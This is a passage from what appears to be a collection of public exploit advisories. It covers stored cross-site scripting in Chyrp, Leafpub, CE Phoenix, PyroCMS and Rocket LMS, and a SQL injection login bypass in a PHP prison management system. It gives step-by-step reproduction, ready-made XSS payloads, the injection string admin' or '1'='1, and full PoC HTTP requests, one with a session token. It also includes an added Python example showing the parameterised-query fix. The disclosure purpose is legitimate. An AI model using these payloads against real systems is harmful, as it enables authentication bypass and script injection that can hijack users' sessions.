Content-Length: 1194
Origin: http://localhost
Referer: http://localhost/chyrp/admin/?action=write_post
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="title"

"><img src=x onerror=alert("Stored")>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="body"

<p>1337</p>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="status"

public
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="slug"


-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="created_at"

04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="original_time"

04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="trackbacks"


-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="feather"

text
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="hash"

11e11aba15114f918ec1c2e6b8f8ddcf
-----------------------------28307567523233313132815561598--
-
Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)
# Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)
# Date: 2024-04-24
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://github.com/Leafpub
# Software Link: https://github.com/Leafpub/leafpub
# Version: 1.1.9
# Tested on: MacOS

### Steps to Reproduce ###

- Log in at: http://localhost/leafpub/admin/login
- Click on Settings > Advanced
- Enter the following payload into the "Custom Code" area (the head-code parameter) and save it: "><img src=x onerror=alert("Stored")>
- An alert box saying "Stored" appears.

### PoC Request ###

POST /leafpub/api/settings HTTP/1.1
Host: localhost
Cookie: authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwlo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 476
Origin: http://localhost
Referer: http://localhost/leafpub/admin/settings
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

title=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on
-
CE Phoenix Version 1.0.8.20 - Stored XSS
# Exploit Title: CE Phoenix Version 1.0.8.20 - Stored XSS
# Date: 2023-11-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://phoenixcart.org/
# Version: 1.0.8.20
# Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix

## POC:

1- Log in to the admin panel and go to this URL: https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
2- Click edit and write your payload in the Title field: <sVg/onLy=1 onLoaD=confirm(1)//
3- Save it and go to this URL: https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
4- A confirm box appears.
-
PyroCMS v3.0.1 - Stored XSS
# Exploit Title: PyroCMS v3.0.1 - Stored XSS
# Date: 2023-11-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://pyrocms.com/
# Version: v3.0.1
# Tested on: https://www.softaculous.com/apps/cms/PyroCMS

----------------------------------------------------------------------------------------------------

1- Log in to the admin panel and go to this URL: https://127.0.0.1/public/admin/redirects/edit/1
2- Write your payload in the Redirect From field: <sVg/onLy=1 onLoaD=confirm(1)//
3- Save it and go to this URL: https://127.0.0.1/public/admin/redirects
4- A confirm box appears.
-
Prison Management System - SQL Injection Authentication Bypass
# Exploit: Prison Management System Using PHP - SQL Injection Authentication Bypass
# Date: 15/03/2024
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sql/17287/prison-management-system.html
# Tested on: Windows, XAMPP
# CVE: CVE-2024-33288

# Proof of Concept:

Step 1 - Visit http://localhost/prison/
Step 2 - Click on the Admin Dashboard button; you are redirected to the login page.
Step 3 - Enter the username admin' or '1'='1 and the password 123456
Step 4 - Click Sign In; you are now logged in as admin.
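Added example, not code from the Prison Management System: the login query shape the payload above exploits, run against an in-memory SQLite table, next to the parameterised query that defeats it. The users table, its rows and the column names are constructed for this example; the application's real schema is not given in the advisory. It also shows why this particular payload depends on an account named admin existing: AND binds tighter than OR, so the injected clause matches the admin row rather than every row.

```python
"""Added example (not the Prison Management System's code): string-built
login query vs. parameterised query, with the advisory's payload.
The schema and rows are constructed for this example."""
import sqlite3

PAYLOAD_USER = "admin' or '1'='1"
PAYLOAD_PASS = "123456"


def make_db():
    """Constructed users table; the real application's schema is unknown."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    db.execute("INSERT INTO users VALUES ('warden', 'keys')")
    return db


def login_vulnerable(db, username, password):
    """String concatenation: the quote in the username closes the literal.
    The resulting WHERE reads
      username = 'admin' OR ('1'='1' AND password = '123456')
    so the admin row matches whatever the password is."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()


def login_fixed(db, username, password):
    """Placeholders keep the whole payload inside one string value."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


def demo():
    db = make_db()
    return {
        "vulnerable": login_vulnerable(db, PAYLOAD_USER, PAYLOAD_PASS),
        "fixed": login_fixed(db, PAYLOAD_USER, PAYLOAD_PASS),
        "legit": login_fixed(db, "admin", "s3cret"),
        # Same payload with a username that does not exist: the OR branch
        # still needs the real password, so the bypass fails.
        "unknown_user": login_vulnerable(db, "nobody' or '1'='1", PAYLOAD_PASS),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:13} -> {row}")
```

If the application hashes passwords before building the query, the injected string still lands in the username literal, so the bypass behaves the same; parameterisation is the fix regardless of how the password column is stored.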
-
Rocket LMS 1.9 - Persistent Cross Site Scripting (XSS)
# Title: Rocket LMS 1.9 - Persistent Cross Site Scripting (XSS)
# Date: 04/16/2024
# Exploit Author: Sergio Medeiros
# Vendor Homepage: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735
# Software Link: https://lms.rocket-soft.org
# Version: 1.9
# Tested on Firefox and Chrome Browsers
# Patched Version: Patch Pending
# Category: Web Application
# CVE: CVE-2024-34241
# Exploit link: https://grumpz.net/cve-2024-34241-a-step-by-step-discovery-guide

# PoC:

To exploit this systemic stored XSS vulnerability, identify the areas of the web application that use a WYSIWYG editor, for example the create/edit course description section. Enter random text in the description field and create the course while intercepting the request with Burp Suite or the proxy of your choice. In the description parameter (or whichever parameter carries the WYSIWYG editor's input), put the following payload and then issue the request:

<details/open/ontoggle=prompt(origin)>